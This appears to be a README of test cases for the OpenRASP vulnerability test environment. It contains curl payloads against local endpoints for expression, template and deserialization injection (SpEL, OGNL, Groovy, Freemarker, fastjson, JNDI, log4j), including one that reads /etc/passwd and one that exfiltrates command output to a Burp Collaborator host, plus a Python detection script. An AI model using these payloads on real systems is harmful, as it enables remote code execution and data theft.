### Script execution
#### ScriptEngineManager
```bash
curl 127.0.0.1:8080/script/javascript -d 'expression=java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### EL
```bash
curl 127.0.0.1:8080/el/parse -d 'expression=Runtime.getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### groovy
Endpoints
```bash
curl 127.0.0.1:8080/groovy/parse -H "Content-Type: text/plain" --data-binary @script.vy
curl 127.0.0.1:8080/groovy/parseClass -H "Content-Type: text/plain" --data-binary @script.vy
curl 127.0.0.1:8080/groovy/evaluate -H "Content-Type: text/plain" --data-binary @script.vy
```
Test script - AST
```groovy
@groovy.transform.ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app")
})
def x
```
Test script - requires network access
```groovy
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{}
print new ProcBuilder("open /System/Applications/Calculator.app").run().getOutputString()
```
Test script - requires network access
```groovy
@GrabConfig(disableChecksums=true)
@GrabResolver(name='payload', root='http://127.0.0.1')
@Grab(group='package', module='payload', version='1')
import Payload;
```
log4j
```groovy
import org.apache.logging.log4j.*;
Logger logger = LogManager.getLogger(getClass());
logger.info ('a={}', '${jndi:ldap://127.0.0.1:1389/a}');
```
[dnslog + result reporting](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/)
```groovy
import groovy.*;
@groovy.transform.ASTTest(value={
cmd = "whoami";
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".XXXXX.burpcollaborator.net";
java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
})
def x
```
#### ognl
Plain execution
```bash
curl 127.0.0.1:8080/ognl/parse -d 'expression=#a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"open", "/System/Applications/Calculator.app/"})).start()'
```
Execute a JS script
```bash
curl 127.0.0.1:8080/ognl/parse -d 'expression=""["getClass"].forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\"open /\")")'
```
#### spel
Plain execution
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=T(java.lang.Runtime).getRuntime().exec("open /System/Applications/Calculator.app")'
```
Read output: use getErrorStream() to read stderr
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("bash", "-c", "whoami").start().getInputStream(), "utf8")).readLine()'
```
Class loading
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=T(org.springframework.cglib.core.ReflectUtils).defineClass("Foo",T(org.springframework.util.Base64Utils).decodeFromString("XXX"),new+javax.management.loading.MLet(new+java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()'
```
RMI
```bash
curl 127.0.0.1:8080/spel/parse -d 'expression=new+javax.management.remote.rmi.RMIConnector(new javax.management.remote.JMXServiceURL("service:jmx:rmi://127.0.0.1:1389/jndi/ldap://127.0.0.1:1389/Basic/Command/Calc"),new java.util.Hashtable()).connect()'
curl 127.0.0.1:8080/spel/parse -d 'expression=T(java.lang.System).setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true") %2B new javax.management.remote.rmi.RMIConnector(new javax.management.remote.JMXServiceURL("service:jmx:rmi://127.0.0.1:1389/jndi/ldap://127.0.0.1:1389/Basic/Command/Calc"), new java.util.Hashtable()).connect()'
```
#### mvel
```bash
curl 127.0.0.1:8080/mvel/parse -d 'expression=Runtime.getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### QLExpress
```bash
curl 127.0.0.1:8080/qlexpress/parse -d 'expression=555-333'
```
### Deserialization
#### JDBC
socket factory
```bash
curl 127.0.0.1:8080/drivermanager/connect -d 'url=jdbc:postgresql://localhost:5432/testdb?socketFactory%3dorg.springframework.context.support.ClassPathXmlApplicationContext%26socketFactoryArg=http://127.0.0.1:8000/bean-exec.xml'
```
ssl factory
```bash
echo S | ncat -l -vv -p 5432
curl 127.0.0.1:8080/drivermanager/connect -d 'url=jdbc:postgresql://localhost:5432/testdb?sslfactory%3dorg.springframework.context.support.FileSystemXmlApplicationContext%26sslfactoryarg=http://127.0.0.1:8000/bean-exec.xml'
```
#### readObject()
```bash
ysoserial CommonsCollections6 "open /System/Applications/Calculator.app" > test
curl 127.0.0.1:8080/object/parse --data-binary @test -H 'Content-Type: text/plain'
rm -f test
```
#### fastjson
```bash
curl 127.0.0.1:8080/fastjson/parse -d 'json={"@type":"org.apache.commons.proxy.provider.remoting.RmiProvider","host":"127.0.0.1",port:"1099","name":"Exploit"}'
curl 127.0.0.1:8080/fastjson/parse -d 'json={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/Exploit","autoCommit":true}'
# syntax compatibility test
curl 127.0.0.1:8080/fastjson/parse -d 'json={,,,,"user":"123",,,,,"111":222}'
```
#### jackson
```bash
curl 127.0.0.1:8080/jackson/parse -d 'json=["com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"ldap://127.0.0.1:1389/Exploit"}]'
```
#### xstream
```bash
curl 127.0.0.1:8080/xstream/parse -H 'Content-Type: text/xml' -d @test.xml
```
#### xmldecoder
```bash
curl 127.0.0.1:8080/xmldecoder/parse -H 'Content-Type: text/xml' -d @test.xml
```
#### jodd-json
```bash
curl 127.0.0.1:8080/jodd/parse -d 'type=com.mchange.v2.c3p0.JndiRefForwardingDataSource&json={"jndiName":"ldap://127.0.0.1:1389/Exploit","loginTimeout":0}'
```
### Template rendering
#### velocity
```bash
curl 127.0.0.1:8080/velocity/eval -d 'username=#set($exp%3d"");$exp.getClass().forName("java.lang.Runtime").getRuntime().exec("open /System/Applications/Calculator.app")'
```
#### freemarker
JythonRuntime requires the class to be available locally: https://tttang.com/archive/1412/
```bash
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value%3d"freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("open /System/Applications/Calculator.app")</@value>'
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value%3d"freemarker.template.utility.Execute"?new()>$${value("open /System/Applications/Calculator.app")}'
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=${"freemarker.template.utility.Execute"?new()("open /System/Applications/Calculator.app")}'
```
eval mode
```bash
curl 127.0.0.1:8080/freemarker/eval -d 'username="freemarker.template.utility.Execute"?new()("open /System/Applications/Calculator.app")'
```
Write a file
```bash
curl 127.0.0.1:8080/freemarker/eval -d 'username="freemarker.template.utility.ObjectConstructor"?new()("java.io.FileWriter","/tmp/test.txt").append("123").close()'
```
Execute a command
```bash
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","open","/System/Applications/Calculator.app").start()}'
```
Read a file
```bash
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign+value="freemarker.template.utility.ObjectConstructor"?new()("java.io.FileReader", "/etc/passwd")>${"freemarker.template.utility.ObjectConstructor"?new()("java.util.Scanner", value).next()}'
```
Execute SpEL
```bash
curl 127.0.0.1:8080/freemarker/unsafe -d 'template=${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("T(java.lang.Runtime).getRuntime().exec(\"open /System/Applications/Calculator.app\")").getValue()}'
```
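Seen from the RASP side, the requests in the sections above share a small set of textual markers: a SpEL `T(java.lang.…)` type reference, an OGNL `#var=` assignment, Freemarker's `?new()` builtin or its `freemarker.template.utility` classes, a fastjson `@type` key, an `ldap://`/`rmi://` JNDI reference, a JDBC `socketFactory`/`sslfactory` parameter, and a `Runtime.exec`/`ProcessBuilder` call. The Python triage script below is an added example and not part of the OpenRASP test cases or of OpenRASP itself; it URL-decodes each request, tags it with the families it matches, and can be pointed at an access or RASP alert log to see which test cases were exercised and which ones went unreported. The `METHOD /path payload` log format, the `INDICATORS` table and `SAMPLE_LOG` (constructed, with payloads borrowed from the curl commands above) are assumptions; Thymeleaf injection is reported as `spel`, since that is the expression language it ends up evaluating.

```python
"""Tag OpenRASP test-case requests by payload family (added example, constructed data)."""
import re
from urllib.parse import unquote_plus

# Textual markers taken from the test cases above. Each (family, regex) pair is
# evaluated against the URL-decoded request payload. This is a review aid for
# the alert log, not a substitute for hooking the sinks themselves.
INDICATORS = [
    ("spel",       re.compile(r"T\(\s*java\.lang\.\w+\s*\)")),
    ("ognl",       re.compile(r"#\w+\s*=|\[\s*['\"]getClass['\"]\s*\]")),
    ("freemarker", re.compile(r"\?new\(\)|freemarker\.template\.utility\.")),
    ("velocity",   re.compile(r"#set\(")),
    ("fastjson",   re.compile(r"\"@type\"\s*:")),
    ("jndi",       re.compile(r"(?i)\b(?:ldap|rmi)://|\$\{jndi:")),
    ("jdbc",       re.compile(r"(?i)\b(?:socketfactory|sslfactory)(?:arg)?=")),
    ("exec",       re.compile(r"getRuntime\(\)\.exec\(|ProcessBuilder\(")),
]

# Constructed log lines in an assumed "METHOD /path payload" format; the payloads
# are the ones from the curl commands above, plus two benign requests.
SAMPLE_LOG = [
    'POST /spel/parse expression=T(java.lang.Runtime).getRuntime().exec("open /System/Applications/Calculator.app")',
    'POST /ognl/parse expression=#a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"open", "/System/Applications/Calculator.app/"})).start()',
    'POST /fastjson/parse json={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/Exploit","autoCommit":true}',
    'POST /freemarker/eval username="freemarker.template.utility.Execute"?new()("open /System/Applications/Calculator.app")',
    'POST /drivermanager/connect url=jdbc:postgresql://localhost:5432/testdb?socketFactory%3dorg.springframework.context.support.ClassPathXmlApplicationContext%26socketFactoryArg=http://127.0.0.1:8000/bean-exec.xml',
    'GET /thymeleaf/path lang=__%24%7BT(java.lang.Runtime).getRuntime().exec(%27%6F%70%65%6E%27)%7D__::',
    'POST /qlexpress/parse expression=555-333',
    'POST /user/login username=alice&password=hunter2',
]


def decode(raw: str) -> str:
    """Undo one layer of percent/plus encoding, which is how the test cases send payloads."""
    return unquote_plus(raw)


def classify(raw: str) -> list[str]:
    """Return the sorted list of indicator families present in one request payload."""
    text = decode(raw)
    return sorted({name for name, rx in INDICATORS if rx.search(text)})


def parse_line(line: str) -> tuple[str, str, str]:
    """Split a 'METHOD /path payload' line; the payload may itself contain spaces."""
    parts = line.rstrip("\n").split(" ", 2)
    if len(parts) == 2:          # request without a payload
        parts.append("")
    method, path, payload = parts
    return method, path, payload


def scan_log(lines) -> list[tuple[str, list[str]]]:
    """Return (path, families) for every line carrying at least one indicator."""
    hits = []
    for line in lines:
        _, path, payload = parse_line(line)
        families = classify(payload)
        if families:
            hits.append((path, families))
    return hits


if __name__ == "__main__":
    for path, families in scan_log(SAMPLE_LOG):
        print(f"{path:<25} {', '.join(families)}")
```

Because these are string matches on the request, a payload that reaches the same sink through a different spelling (reflection, string concatenation, a second encoding layer) will not be tagged; that is exactly the gap a RASP closes by instrumenting `Runtime.exec`, the deserialization entry points and the JNDI lookups rather than inspecting text, which is what the test cases above are meant to verify.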
#### thymeleaf template injection
https://github.com/veracode-research/spring-view-manipulation
```bash
curl 'http://127.0.0.1:8080/thymeleaf/path?lang=__%24%7BT(java.lang.Runtime).getRuntime().exec(%27%6F%70%65%6E%20%2F%53%79%73%74%65%6D%2F%41%70%70%6C%69%63%61%74%69%6F%6E%73%2F%43%61%6C%63%75%6C%61%74%6F%72%2E%61%70%70%27)%7D__::'
```
Package: OpenRASP vulnerability test environment, openrasp-testcases.zip (340 files)